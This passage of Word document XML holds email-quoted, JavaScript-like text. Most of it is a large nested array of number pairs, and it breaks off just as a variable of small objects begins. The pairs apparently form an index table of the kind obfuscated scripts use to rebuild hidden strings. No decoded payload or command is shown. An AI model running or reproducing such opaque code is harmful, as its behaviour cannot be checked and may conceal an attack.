        <w:t xml:space="preserve"> = [[[9, 51], [8, 116], [6, 180], [6, 10], [3, 59], [9, 182], [2, 21], [7, 120], [5, 1], [8, 7], [3, 121], [3, 208], [0, 41], [0, 161], [6, 172], [4, 17], [1, 70], [0, 124], [3, 179], [5, 211], [9, 23], [6, 229], [7, 163], [7, 210], [1, 98], [0, 173], [8, 176], [5, 154], [9, 13],[4, 146], [8, 132], [1, 189], [7, 225], [2, 212], [0, 218], [8, 125], [9, 3], [5, 117], [0, 112], [5, 28], [2, 66], [7, 164], [1, 128], [3, 187], [3, 61], [8, 139], [4, 22], [0, 26], [1, 103], [7, 99], [5, 12], [0, 198], [4, 100], [1, 126], [5, 84], [1, 134], [1, 206], [8, 151], [1, 27], [9, 196], [8, 34], [0, 114], [6, 184], [0, 197], [0, 101], [4, 102], [1, 86], [0, 123], [8, 140], [2, 32], [9, 188], [7, 6], [3, 106], [9, 37], [8, 205], [9, 202], [9, 4], [9, 214], [3, 94], [4, 74], [7, 79], [5, 71], [1, 109], [1, 159], [0, 64], [1, 152], [5, 68], [1, 78], [3, 156], [8, 90], [4, 50], [8, 38], [9, 150], [3, 31], [9, 127], [4, 46], [5, 167], [6, 183], [0, 54], [5, 30], [7, 60], [8, 107], [7, 133], [5, 49], [8, 14], [6, 72], [3, 201], [1, 175], [8, 67], [4, 88], [2, 63], [5, 157], [3, 145], [7, 108], [8, 147], [7, 9], [9, 36], [3, 5], [9, 52], [3, 222], [4, 148], [7, 200], [1, 166], [7, 131], [8, 57], [8, 207], [2, 169], [2, 181], [4, 53], [3, 195], [5, 224], [1, 144], [1, 135], [5, 230], [6, 168], [6, 56], [9, 192], [4, 138], [4, 65], [5, 16], [5, 190], [6, 155], [0, 19], [6, 171], [1, 165], [9, 82], [5, 75], [2, 203], [4, 58], [2, 136], [8, 216], [6, 118], [1, 0], [8, 39], [4, 119], [0, 29], [5, 105], [5, 227], [3, 81], [6, 93], [7, 186], [5, 2], [3, 217], [2, 11], [5, 87], [7, 122], [5, 142], [8, 47], [6, 162], [1, 43], [8, 25], [0, 174], [0, 149], [8, 226], [3, 69], [8, 73], [3, 143], [5, 104], [7, 76], [9, 77], [4, 141], [9, 33], [1, 219], [2, 130], [5, 35], [7, 83], [5, 160], [3, 223], [5, 178], [5, 80], [7, 89], [8, 113], [1, 170], [8, 110], [1, 209], [2, 215], [7, 153], [0, 24], [0, 42], [6, 220], [6, 191], [5, 115], [9, 48], [9, 18], [0, 111], [5, 96], [4, 44], [1, 91], [4, 92], [1, 228], [8, 194], [5, 158], [7, 221], [7, 15],[1, 95], [0, 129], [1, 55], [4, 204], [6, 97], [8, 8], [2, 20], </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">[8, 45], [2, 185], [5, 213], [2, 199], [9, 40], [0, 62], [4, 193], [5, 137], [6, 177], [7, 85]], [[1, 176], [7, 74], [2, 72], [0, 188], [2, 133], [4, 199], [0, 47], [5, 49], [3, 210], [8, 227], [2, 203], [6, 17], [9, 112], [0, 45], [5, 194], [4, 73], [6, 69], [8, 27], [9, 163], [9, 222], [7, 14], [0, 51], [0, 106], [2, 109], [4, 122], [3, 148], [9, 228], [9, 1], [4, 206], [7, 114], [8, 229], [4, 103], [8, 157], [1, 31], [7, 30], [2, 219], [3, 29], [2, 81], [9, 186], [3, 189], [3, 2], [8, 79], [7, 141], [1, 214], [1, 35], [2, 185], [3, 107], [5, 197], [9, 204], [3, 75], [3, 145], [9, 100], [0, 140], [9, 22], [8, 7], [4, 187], [1, 83], [4, 151], [3, 165], [0, 40],[1, 66], [4, 11], [6, 213], [3, 131], [1, 162], [6, 178], [2, 123], [6, 43], [2, 150], [3, 223], [4, 95], [6, 99], [0, 196], [3, 18], [2, 65], [1,55], [0, 46], [1, 53], [0, 104], [1, 41], [4, 179], [7, 182], [1, 134], [5, 153], [7, 64], [4, 78], [0, 175], [0, 130], [1, 60], [1, 195], [4, 218], [3, 32], [6, 190], [9, 144], [1, 84], [3, 118], [3, 149], [8, 132], [3, 63], [4, 158], [2, 152], [0, 33], [9, 164], [6, 8], [1, 136], [4, 192], [9, 4], [6, 94], [1, 19], [8, 76], [0, 143], [4, 88], [4, 171], [6, 180], [3, 105], [6, 50], [6, 39], [2, 56], [2, 169], [4, 26], [1, 28], [2, 142], [9, 156], [7, 119], [6, 12], [0, 48], [6, 21], [4, 44], [4, 108], [6, 127], [1, 208], [5, 34], [2, 92], [3, 215], [7, 37], [4, 198], [2, 211], [9, 230], [9, 70], [1, 191], [7, 173], [7, 116], [1, 67], [2, 0], [9, 77], [1, 120], [1, 129], [4, 80], [3, 220], [0, 135], [0, 3], [9, 93], [8, 205], [5, 170], [9, 216], [2, 38], [9, 124], [0, 168], [8, 62], [2, 167], [1, 172], [2, 68], [6, 201], [4, 113], [9, 15], [5, 161], [9, 54], [9, 147], [4, 117], [1, 212], [9, 159], [5, 128], [1, 71], [9, 160], [9, 221], [1, 125], [6, 101], [0, 166], [0, 85], [2, 138], [3, 224], [5, 200], [3, 91], [4, 6], [4, 86], [9, 59], [9, 155], [0, 217], [2, 139], [2, 9], [5, 225], [1, 193], [8, 20], [3, 137], [5, 183], [7, 102], [9, 13], [4, 226], [6, 52], [8, 115], [9, 184], [6, 5], [0, 23], [4, 177], [9, 36], [6, 42], [5, 24], [8, 25], [5, 87], [3, 174], [0, 82], [4, 146], [3, 89], [0, 96], [2, 10], [4, 110], [2, 111], [6, 181], [7, 121], [8, 16], [9, 154], [9, 90], [7, 97], [1, 98], [1, 209], [2, 207], [1, 61], [0, 58], [1, 126], [7, 202], [2, 57]], [[6, 157], [4, 118], [2, 20], [1, 130], [7, 43], [8, 125], [2, 79], [1, 187], [5, 109], [6, 25], [8, 135], [5, 140], [0, 65], [1, 122],[7, 12], [8, 172], [8, 15], [0, 144], [4, 156], [8, 5], [9, 7], [2, 16], [1, 27], [2, 145], [6, 28], [3, 0], [2, 201], [8, 91], [1, 17], [3, 68], [3, 134], [5, 149], [4, 63], [6, 192], [0, 94], [7, 146], [1, 212], [8, 198], [5, 47], [4, 99], [6, 86], [8, 139], [6, 66], [7, 57], [8, 162], [8, 110], [0, 120], [8, 215], [6, 216], [9, 168], [4, 200], [6, 158], [8, 190], [5, 64], [7, 119], [7, 186], [1, 183], [8, 88], [3, 24], [7, 228], [7, 165], [5, 26], [6, 116], [7, 222], [7, 95], [0, 181], [0, 189], [6, 71], [2, 55], [4, 203], [6, 147], [4, 107], [6, 202], [0, 218], [8, 73], [5, 67], [7, 141], [3, 152], [8, 197], [2, 164], [4, 121], [7, 84], [2, 205], [9, 102], [5, 22], [9, 143], [8, 105], [0, 76], [0, 221], [1, 97], [4, 37],[7, 204], [8, 180], [0, 225], [9, 177], [4, 39], [0, 184], [8, 126], [5, 124], [2, 74], [9, 53], [4, 199], [6, 195], [2, 52], [7, 166], [7, 89], [3, 87], [9, 45], [0, 131], [1, 161], [3, 38], [1, 210], [4, 80], [0, 160], [5, 220], [8, 6], [6, 214], [1, 150], [1, 224], [8, 153], [8, 77], [5, 106], [5, 206], [2, 54], [4, 4], [5, 173], [4, 194], [7, 137], [8, 100], [8, 208], [7, 19], [7, 18], [1, 132], [7, 128], [7, 182], [1, 33], [3, 213], [4, 96], [0, 69], [9, 34], [3, 92], [1, 58], [8, 81], [8, 207], [8, 10], [4, 30], [7, 83], [9, 8], [9, 123], [7, 50], [4, 31], [0, 138], [1, 176], [4, 36], [9, 21], [2, 112], [5, 219], [5, 35], [2, 61], [3, 171], [4, 163], [9, 193], [6, 98], [2, 60], [8, 70], [3, 40], [1, 14], [1, 104], [4, 93], [4, 101], [6, 133], [1, 179], [5, 49], [0, 191], [4, 103], [9, 129], [1, 23], [2, 229], [2, 3], [7, 175], [7, 178], [0, </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">154], [5, 115], [6, 59], [6, 111], [9, 127], [2, 170], [6, 1], [3, 78], [5, 72], [9, 209], [8, 185], [3, 159], [1, 151], [9, 188], [7, 169], [7, 136], [1, 196], [2, 62],[3, 90], [4, 167], [3, 44], [4, 42], [5, 114], [7, 29], [4, 82], [4, 217], [6, 85], [0, 32], [5, 56], [2, 226], [5, 11], [3, 2], [3, 174], [9, 227], [8, 223], [9, 117], [4, 48], [9, 230], [9, 155], [3, 211], [5, 51], [0, 13], [7, 148], [7, 108], [0, 41], [2, 113], [8, 9], [0, 142], [3, 46], [7, 75]], [[3, 163], [4, 117], [4, 23], [5, 104], [3, 15], [8, 64], [0, 99], [4, 94], [0, 159], [7, 167], [7, 26], [8, 164], [2, 196], [9, 175], [3,60], [6, 227], [0, 205], [7, 78], [0, 189], [4, 110], [2, 75], [8, 230], [5, 223], [5, 48], [4, 65], [2, 161], [6, 24], [2, 139], [1, 206], [5, 14], [6, 36], [0, 128], [5, 41], [3, 83], [2, 53], [9, 115], [6, 50], [6, 120], [7, 11], [4, 46], [4, 121], [6, 202], [6, 114], [4, 8], [5, 129], [2,201], [9, 155], [6, 107], [5, 58], [8, 136], [0, 207], [5, 177], [4, 5], [7, 10], [6, 219], [7, 152], [4, 29], [3, 86], [6, 222], [8, 166], [0, 138], [0, 106], [3, 84], [6, 49], [2, 82], [7, 200], [2, 217], [9, 211], [3, 171], [9, 119], [9, 43], [9, 102], [3, 148], [6, 178], [1, 228], [9, 165], [5, 33], [8, 142], [2, 150], [6, 118], [0, 187], [7, 100], [8, 12], [5, 190], [6, 124], [4, 199], [4, 185], [4, 194], [5, 220], [2, 113], [7, 70], [7, 127], [6, 151], [1, 57], [2, 197], [8, 81], [7, 210], [6, 51], [9, 69], [7, 198], [4, 92], [1, 143], [6, 95], [8, 203], [5, 91], [6, 22], [4, 37], [6, 214], [4, 9], [2, 162], [4, 135], [0, 172], [6, 173], [8, 112], [3, 180], [9, 39], [7, 168], [5, 192], [0, 40], [4, 131], [8, 146], [4, 87], [9, 111], [8, 208], [9, 103], [8, 88], [1, 213], [3, 42], [3, 105], [8, 17], [8, 174], [9, 47], [3, 186], [0, 212], [0, 126], [6, 218], [0, 38], [2, 72], [7, 55], [0, 77], [0, 193], [1, 45], [8, 179], [2, 62], [3, 66], [7, 147], [7, 59], [4, 145], [3, 85], [8, 149], [0, 19], [4, 2], [6, 116], [5, 182], [5, 191], [2, 90], [1, 122], [2, 56], [2, 13], [7, 209], [8, 183], [9, 134], [1, 27], [3, 34], [7, 133], [4, 35], [2, 144], [7, 3], [9, 195], [6, 61], [2, 63], [7, 0], [8, 108], [8, 7], [9, 4], [8, 204], [4, 73], [1, 169], [2, 1], [5, 44], [4, 76], [6, 98], [0, 21], [7, 157], [8, 137], [0, 160], [0, 32], [0, 156], [3, 130], [4, 109], [9, 221], [2, 54], [7, 154], [4, 79], [1, 71], [5, 170], [0, 153], [3, 226], [1, 141], [0,68], [6, 140], [1, 125], [0, 188], [5, 123], [2, 93], [4, 132], [3, 181], [4, 176], [9, 229], [6, 216], [8, 224], [6, 6], [0, 74], [9, 101], [6, 31], [4, 158], [5, 225], [2, 52], [8, 28], [5, 16], [0, 20], [2, 67], [3, 80], [7, 18], [9, 184], [8, 97], [7, 30], [7, 215], [9, 96], [5, 25], [9, 89]], [[9, 37], [6, 52], [4, 82], [5, 151], [6, 99], [9, 23], [2, 179], [0, 80], [4, 96], [0, 154], [3, 71], [0, 8], [7, 195], [9, 26], [1, 225], [9, 180], [6, 170], [4, 81], [7, 185], [5, 218], [9, 4], [9, 86], [2, 87], [4, 44], [1, 38], [2, 42], [1, 199], [6, 113], [7, 105], [9, 141], [0, 28], [3, 150], [4, 109], [0, 164], [4, 102], [7, 128], [0, 50], [1, 31], [0, 166], [2, 10], [3, 162], [1, 6], [2, 65], [7, 189], [7, 79], [7, 149], [2, 174], [6, 24], [8, 84], [6, 186], [7, 1], [5, 98], [7, 208], [9, 201], [3, 17], [4, 18], [0, 182], [3, 118], [2, 56], [8, 153], [0, 157], [8, 196], [4, 122], [0, 152], [5, 222], [9, 137], [5, 68], [4, 63], [7, 66], [9, 139], [3, 69], [7, 132], [3, 210], [5, 70], [9, 209], [1, 230], [1, 173], [5, 130], [3, 217], [4, 14], [5, 143], [4, 197], [1, 60], [3, 194], [2, 49], [8, 207], [6, 155], [3, 229], [7, 116], [9, 192], [7, 72], [6, 184],[1, 101], [6, 193], [6, 131], [5, 15], [2, 206], [5, 200], [9, 160], [0, 92], [1, 216], [9, 203], [9, 110], [4, 53], [5, 123], [5, 167], [6, 91], [8, 97], [6, 20], [3, 62], [9, 40], [6, 108], [4, 161], [5, 43], [2, 177], [0, 158], [4, 111], [2, 34], [2, 129], [9, 55], [4, 211], [9, 58], [2, 47], [5, 74], [3, 67], [0, 165], [1, 21], [8, 61], [9, 90], [0, 176], [6, 135], [3, 147], [2, 35], [4, 103], [3, 144], [7, 215], [1, 171], [6, 54], [3, 134], [8, 187], [4, 183], </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">[2, 89], [8, 0], [1, 168], [5, 107], [7, 127], [8, 25], [4, 100], [9, 224], [8, 41], [0, 39], [5, 126], [0, 181], [0,7], [5, 140], [4, 32], [4, 45], [8, 57], [3, 106], [6, 172], [8, 59], [6, 73], [8, 188], [8, 169], [1, 78], [3, 36], [9, 93], [7, 121], [5, 125], [0, 223], [8, 5], [4, 133], [9, 9], [7, 220], [6, 3], [2, 85], [2, 221], [0, 33], [6, 27], [6, 2], [1, 51], [6, 175], [3, 22], [2, 142], [8, 204], [5, 138], [5, 159], [7, 146], [3, 178], [0, 156], [5, 115], [7, 83], [7, 202], [6, 30], [4, 228], [5, 19], [8, 136], [0, 119], [9, 205], [4, 75], [0, 191], [8, 163], [3, 213], [9, 124], [6, 114], [2, 11], [8, 112], [7, 77], [3, 227], [5, 64], [4, 145], [8, 219], [1, 148], [5, 214], [8, 88], [5, 29], [7, 13], [8, 95], [1, 117], [7, 12], [3, 94], [8, 46], [8, 104], [9, 226], [4, 76], [0, 212], [3, 190], [3, 48], [3, 198], [5, 16], [3, 120]], [[2, 49], [1, 50], [8, 86], [6, 132], [8, 73], [2, 167], [8, 180], [9, 121], [7, 123], [6, 88], [5, 108], [7, 22], [3, 40], [5, 122], [0, 228], [6, 130], [3, 183], [1, 157], [9, 200], [4, 166], [4, 85], [5, 8], [5, 106], [5, 21], [1, 91], [2, 113], [3, 41], [4, 74], [5, 0], [4, 75], [7, 69], [1, 160], [8, 223], [2, 199], [9, 93], [2, 148], [8, 227], [3, 39], [3, 182], [1, 36], [2, 215], [9, 173], [0, 143], [7, 57], [2, 128], [4, 16], [8, 5], [5, 151], [0, 155], [9, 84], [9, 129], [5, 96], [6, 114], [4, 205], [7, 222], [0, 126], [0, 158], [8, 174], [9, 153], [2, 66], [4, 209], [4, 2], [8, 35], [3, 198], [0, 144], [0, 78], [2, 163], [0, 201], [0, 76], [8, 145], [2, 181], [9, 176], [4, 10], [6, 99], [2, 159], [6, 31], [9, 43], [6, 188], [7, 118], [3, 48], [7, 112], [6, 216], [8, 136], [1, 170], [6, 51], [3, 44], [4, 221], [6, 79], [7, 59], [1, 95], [5, 120], [0, 4], [3,37], [5, 70], [7, 27], [7, 219], [9, 169], [4, 125], [5, 187], [4, 150], [7, 202], [9, 18], [3, 154], [5, 68], [4, 217], [1, 117], [8, 225], [9, 226], [9, 42], [8, 32], [4, 53], [5, 141], [2, 71], [2, 146], [2, 81], [0, 208], [3, 196], [1, 11], [4, 61], [2, 162], [7, 47], [6, 56], [6, 179], [0, 175], [9, 87], [5, 133], [0, 109], [6, 171], [8, 186], [6, 204], [7, 138], [3, 107], [6, 64], [2, 14], [7, 135], [5, 101], [2, 164], [2, 97], [2, 213], [1, 203], [7, 197], [3, 214], [0, 13], [5, 212], [7, 211], [6, 190], [4, 100], [1, 134], [5, 26], [2, 124], [3, 15], [3, 189], [0, 52], [0,45], [5, 220], [1, 94], [9, 229], [0, 58], [5, 156], [4, 33], [7, 62], [1, 20], [9, 72], [5, 7], [9, 103], [1, 102], [3, 55], [7, 218], [8, 194], [2, 83], [9, 67], [6, 6], [9, 46], [5, 19], [9, 34], [8, 28], [1, 12], [9, 172], [7, 17], [8, 105], [4, 29], [6, 77], [3, 127], [6, 54], [0, 98], [0, 177], [7, 60], [2, 142], [4, 207], [9, 111], [8, 139], [0, 224], [9, 168], [1, 131], [9, 210], [8, 63], [1, 110], [6, 3], [0, 119], [0, 30], [2,65], [7, 149], [2, 193], [9, 184], [5, 23], [7, 147], [7, 140], [4, 206], [3, 38], [7, 165], [9, 161], [8, 115], [2, 104], [5, 152], [3, 137], [4,25], [5, 192], [7, 24], [5, 230], [5, 82], [1, 80], [0, 90], [7, 195], [2, 116], [9, 191], [5, 9], [1, 185], [3, 89], [3, 1], [9, 178], [9, 92]], [[2, 121], [3, 147], [9, 93], [3, 230], [2, 223], [6, 200], [6, 89], [9, 115], [3, 77], [2, 103], [2, 204], [3, 145], [5, 142], [9, 95], [8, 176], [7, 59], [3, 52], [8, 141], [7, 172], [6, 10], [1, 73], [7, 171], [1, 51], [2, 178], [0, 194], [0, 143], [3, 15], [0, 133], [3, 53], [9, 189], [2, 159], [0, 106], [3, 210], [0, 157], [8, 81], [5, 190], [2, 185], [3, 197], [6, 70], [9, 174], [3, 24], [5, 37], [2, 3], [5, 160], [7, 168], [4, 62], [5, 57], [0, 135], [0, 7], [4, 4], [4, 161], [1, 5], [4, 44], [0, 85], [1, 216], [0, 217], [6, 124], [8, 206], [9, 211], [1, 125], [3, 49], [2, 213], [8, 166], [7, 80], [3, 100], [0, 19], [4, 164], [9, 16], [5, 192], [1, 138], [2, 86], [2, 177], [0, 122], [9, 108], [1, 22], [5, 113], [9, 131], [1, 101], [2, 181], [7, 72], [6, 43], [3, 222], [2, 40], [7, 41], [5, 13], [8, 25], [3, 48], [2, 104], [1, 130], [1, 63], [3, 45], [0, 50], [4, 84], [5, 126], [1, 18], [6, 35], [1, 165], [7, 23], [0, 146], [6, 153], [8, 212], [5, 111], [6, </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">32], [2, 220], [4, 187], [2, 184], [7, 215], [0, 17], [5, 47], [5, 39], [3, 148], [1, 91], [2, 36], [0, 105], [3, 65], [2, 186], [1, 38], [3, 227], [4, 6], [2, 134], [9, 199], [3, 155], [6, 229], [4, 162], [1, 198], [5, 170], [6, 94], [7, 78], [5, 139], [1, 76], [7, 99], [6, 12], [2, 225], [8, 140], [9, 82], [4, 228], [0, 127], [2, 201], [0, 128], [3, 151], [4, 163], [9, 87], [8, 120], [2, 29], [0, 56], [2, 179], [4, 26], [2, 167], [3, 74], [8, 118], [2, 205], [7, 180], [9, 158], [2, 2],[5, 109], [7, 34], [4, 28], [1, 193], [4, 79], [9, 90], [0, 21], [7, 58], [6, 116], [7, 169], [0, 218], [9, 66], [8, 137], [3, 102], [0, 112], [6,183], [3, 68], [0, 97], [5, 149], [0, 188], [8, 98], [0, 226], [1, 191], [5, 61], [9, 27], [1, 154], [7, 9], [0, 30], [7, 33], [0, 221], [1, 214],[0, 11], [7, 83], [8, 46], [7, 182], [8, 8], [0, 75], [9, 67], [1, 195], [8, 207], [1, 224], [5, 119], [9, 132], [7, 69], [1, 0], [8, 110], [4, 156], [6, 88], [0, 123], [6, 1], [5, 96], [1, 31], [4, 219], [7, 117], [1, 55], [8, 107], [8, 129], [2, 202], [2, 175], [7, 114], [8, 92], [7, 42], [5, 64], [6, 203], [8, 150], [0, 173], [6, 136], [1, 152], [2, 54], [7, 208], [3, 71], [7, 196], [9, 144], [5, 209], [6, 14], [2, 60], [6, 20]], [[4, 72], [7, 81], [1, 124], [1, 94], [3, 151], [7, 154], [3, 66], [0, 160], [5, 90], [8, 60], [6, 172], [0, 61], [0, 143], [2, 158], [9, 127], [5, 36], [7, 24], [5, 190], [4, 195], [5, 106], [7, 150], [6, 119], [6, 37], [6, 45], [3, 7], [0, 130], [5, 169], [9, 133], [3, 9], [2, 210], [5, 228], [0, 52], [1, 122], [5, 164], [2, 202], [5, 128], [8, 138], [4, 201], [8, 4], [6, 42], [5, 70], [1, 208], [3, 156], [5, 137], [4, 111], [2, 43], [4, 93], [4, 31], [2, 104], [0, 147], [7, 84], [3, 165], [8, 5], [3, 185], [9, 186], [9, 58], [5, 92], [2, 207], [7, 155], [4, 177], [1, 86], [9, 211],[0, 73], [4, 62], [7, 131], [7, 116], [3, 132], [5, 196], [4, 99], [5, 1], [5, 103], [6, 204], [8, 51], [4, 78], [6, 182], [5, 82], [9, 206], [3, 166], [4, 171], [5, 74], [0, 27], [5, 105], [0, 215], [7, 50], [4, 8], [2, 109], [8, 214], [5, 199], [5, 11], [2, 101], [5, 200], [3, 100], [6, 18], [9, 129], [3, 223], [4, 10], [4, 163], [8, 220], [8, 22], [8, 191], [3, 146], [4, 125], [6, 88], [1, 181], [1, 85], [2, 33], [3, 226], [6, 140], [9, 54], [1, 219], [3, 26], [8, 114], [7, 67], [6, 25], [4, 29], [8, 110], [3, 118], [7, 71], [1, 227], [5, 56], [0, 145], [6, 77], [7, 221], [3, 192], [6, 39], [7, 216], [3, 6], [4, 120], [2, 80], [8, 229], [6, 230], [4, 152], [9, 59], [5, 203], [1, 224], [7, 96], [3, 123], [4, 30], [2, 121],[8, 175], [2, 141], [3, 16], [0, 55], [3, 91], [8, 53], [7, 212], [5, 148], [0, 48], [8, 144], [7, 83], [9, 218], [2, 44], [2, 217], [5, 32], [9, 28], [3, 49], [0, 63], [3, 189], [5, 14], [3, 2], [8, 178], [2, 57], [0, 168], [6, 179], [3, 153], [0, 3], [6, 13], [2, 135], [6, 213], [7, 102], [4, 21], [8, 117], [7, 187], [6, 76], [9, 174], [3, 157], [8, 35], [3, 0], [1, 20], [4, 113], [1, 19], [3, 38], [7, 68], [2, 107], [1, 142], [2, 23], [5, 115], [7, 95], [0, 184], [6, 159], [1, 205], [7, 126], [7, 197], [3, 183], [1, 176], [3, 69], [9, 15], [4, 79], [9, 188], [0, 89], [7, 149], [1, 194], [8, 209], [3, 34], [5, 193], [2, 87], [7, 112], [3, 98], [3, 97], [6, 46], [8, 139], [0, 108], [7, 198], [4, 17], [6, 64], [8, 167], [4, 225], [5, 41], [0, 75], [0, 12], [9, 47], [1, 161], [6, 65], [5, 170], [0, 222], [1, 180], [0, 173], [5, 162], [3, 134], [5, 136], [5, 40]], [[0, 64], [6, 151], [7, 224], [8, 185], [6, 207], [0, 149], [6, 83], [6, 184], [4, 141], [6, 89], [7, 68], [9, 55], [5, 193], [9, 30], [3, 57], [6, 90], [6, 16], [1, 211], [4, 182], [9, 119], [3, 126], [9, 230], [6, 85], [2, 127], [8, 79], [5, 47], [6, 102], [9, 38], [4, 189], [8, 180], [6, 59], [6,91], [1, 171], [7, 131], [0, 161], [1, 48], [9, 115], [1, 15], [1, 120], [4, 214], [7, 157], [8, 158], [7, 82], [3, 56], [8, 156], [3, 61], [5, 41], [0, 186], [4, 139], [8, 65], [5, 113], [2, 148], [7, 135], [3, 103], [0, 71], [1, 167], [3, 3], [0, 105], [3, 92], [8, 37], [0, 72], [2, 9], </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>[8,67], [4, 176], [5, 14], [6, 229], [5, 146], [4, 108], [1, 74], [2, 70], [7, 133], [0, 201], [5, 153], [8, 216], [2, 159], [8, 96], [0, 228], [9, 227], [8, 0], [0, 5], [3, 117], [2, 173], [1, 181], [6, 204], [8, 75], [6, 7], [0, 33], [0, 217], [3, 220], [9, 25], [7, 175], [0, 86], [2, 206], [6, 27], [6, 205], [3, 42], [4, 106], [1, 172], [4, 213], [6, 168], [4, 87], [1, 18], [4, 17], [8, 6], [3, 54], [7, 179], [4, 128], [6, 132], [0, 138], [2, 169], [0, 225], [9, 130], [1, 174], [2, 223], [8, 53], [5, 142], [2, 199], [2, 160], [7, 166], [7, 40], [3, 23], [3, 76], [9, 28], [0, 94], [4, 88], [3, 104], [5, 210], [7, 66], [9, 165], [4, 63], [5, 107], [2, 197], [9, 125], [6, 21], [9, 110], [7, 112], [6, 116], [9, 226], [8, 122], [5, 140], [5, 93], [4, 164], [7, 155], [5, 4], [3, 95], [5, 50], [4, 60], [9, 12], [6, 32], [8, 19], [7, 187], [0, 35], [1, 121], [3, 192], [6, 22],[2, 84], [9, 200], [8, 46], [1, 203], [5, 109], [2, 80], [3, 114], [1, 209], [4, 13], [0, 129], [8, 78], [3, 162], [8, 29], [8, 8], [4, 152], [2, 20], [6, 98], [8, 170], [1, 36], [7, 26], [4, 194], [6, 10], [9, 118], [5, 188], [5, 81], [0, 215], [7, 97], [7, 191], [2, 124], [0, 143], [8, 100], [9, 101], [4, 198], [3, 1], [1, 45], [1, 11], [0, 31], [5, 218], [1, 212], [8, 44], [5, 134], [7, 154], [6, 202], [0, 177], [3, 34], [4, 219], [0, 196], [2, 62], [1, 144], [6, 99], [2, 49], [7, 221], [0, 178], [4, 190], [6, 111], [8, 52], [8, 147], [7, 24], [9, 183], [7, 69], [1, 73], [2, 43], [2, 39], [7, 195], [2, 2], [9, 145], [7, 150], [6, 136], [8, 222], [3, 51], [4, 77], [1, 137], [1, 58], [0, 208], [7, 163], [4, 123]], [[9, 16],[4, 69], [5, 162], [0, 56], [8, 197], [6, 159], [4, 84], [3, 25], [3, 52], [9, 11], [9, 76], [8, 223], [6, 147], [3, 7], [3, 39], [7, 230], [3, 155], [1, 75], [1, 165], [2, 206], [0, 205], [8, 179], [5, 198], [6, 28], [3, 123], [6, 102], [2, 149], [7, 137], [0, 227], [4, 186], [2, 74], [4, 212], [1, 225], [7, 5], [8, 98], [4, 77], [5, 21], [9, 220], [9, 38], [1, 10], [5, 73], [4, 53], [9, 49], [8, 121], [0, 156], [8, 113], [3, 32], [7, 175], [9, 89], [2, 107], [5, 188], [6, 57], [6, 81], [8, 50], [0, 120], [5, 17], [0, 80], [7, 55], [4, 96], [2, 14], [1, 151], [5, 128], [5, 131], [0, 158], [6, 130], [7, 145], [4, 23], [4, 106], [8, 64], [5, 90], [8, 214], [9, 29], [3, 71], [7, 119], [8, 66], [9, 211], [8, 30], [0, 63], [9, 164], [6, 178], [5, 35], [3, 114], [7, 13], [0, 40], [7, 9], [4, 109], [5, 216], [7, 189], [5, 94], [8, 173], [0, 61], [1, 27], [2, 184], [0, 41], [7, 166], [5, 170], [8, 78], [1, 54], [8, 72], [3, 185], [7, 126], [7, 146], [4, 217], [6, 43], [5, 20], [4, 213], [4, 221], [8, 157], [2, 51], [7, 8], [6, 229], [5, 2], [0, 194], [6, 122], [5, 222], [2, 200], [1, 168], [7, 132], [2, 135], [2, 196], [3, 199], [4, 141], [0, 112], [7, 45], [2, 167], [1, 133], [9, 210], [0, 67], [8, 62], [1, 26], [2, 138], [5, 103], [3, 93], [2, 154], [8, 12], [8, 68], [9, 99], [8, 85], [1, 105], [4, 176], [5, 129], [2, 124], [0, 83], [3, 97], [7, 218], [6, 104], [8, 228], [3, 172], [7, 70], [0, 95], [8, 171], [8, 108], [4, 204], [0, 47], [7, 110], [3,37], [2, 34], [8, 181], [3, 209], [5, 91], [6, 58], [1, 148], [8, 4], [8, 116], [9, 224], [1, 18], [8, 201], [0, 203], [9, 193], [0, 134], [9, 36], [6, 143], [9, 48], [0, 163], [2, 174], [9, 86], [4, 115], [3, 82], [4, 161], [9, 33], [7, 1], [4, 79], [0, 160], [9, 87], [2, 190], [7, 15], [1, 153], [3, 59], [8, 46], [3, 177], [1, 92], [3, 100], [4, 139], [5, 117], [8, 187], [8, 226], [2, 101], [4, 183], [9, 111], [0, 19], [1, 144], [6, 6], [7, 142], [5, 136], [7, 42], [6, 60], [4, 22], [3, 118], [7, 191], [8, 24], [4, 152], [0, 65], [5, 88], [7, 140], [2, 195], [0, 31], [2, 127], [4, 125], [6, 182], [4, 3], [3, 207], [1, 208], [4, 169], [3, 202], [7, 219], [1, 180], [8, 150], [5, 192], [3, 44], [0, 215], [1, 0]]];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6CD6DD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">&gt;&gt;     var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = [{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7BCCFB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617373DA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 4, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253054A7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 2, 3, 117]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2C5812" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223B765E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
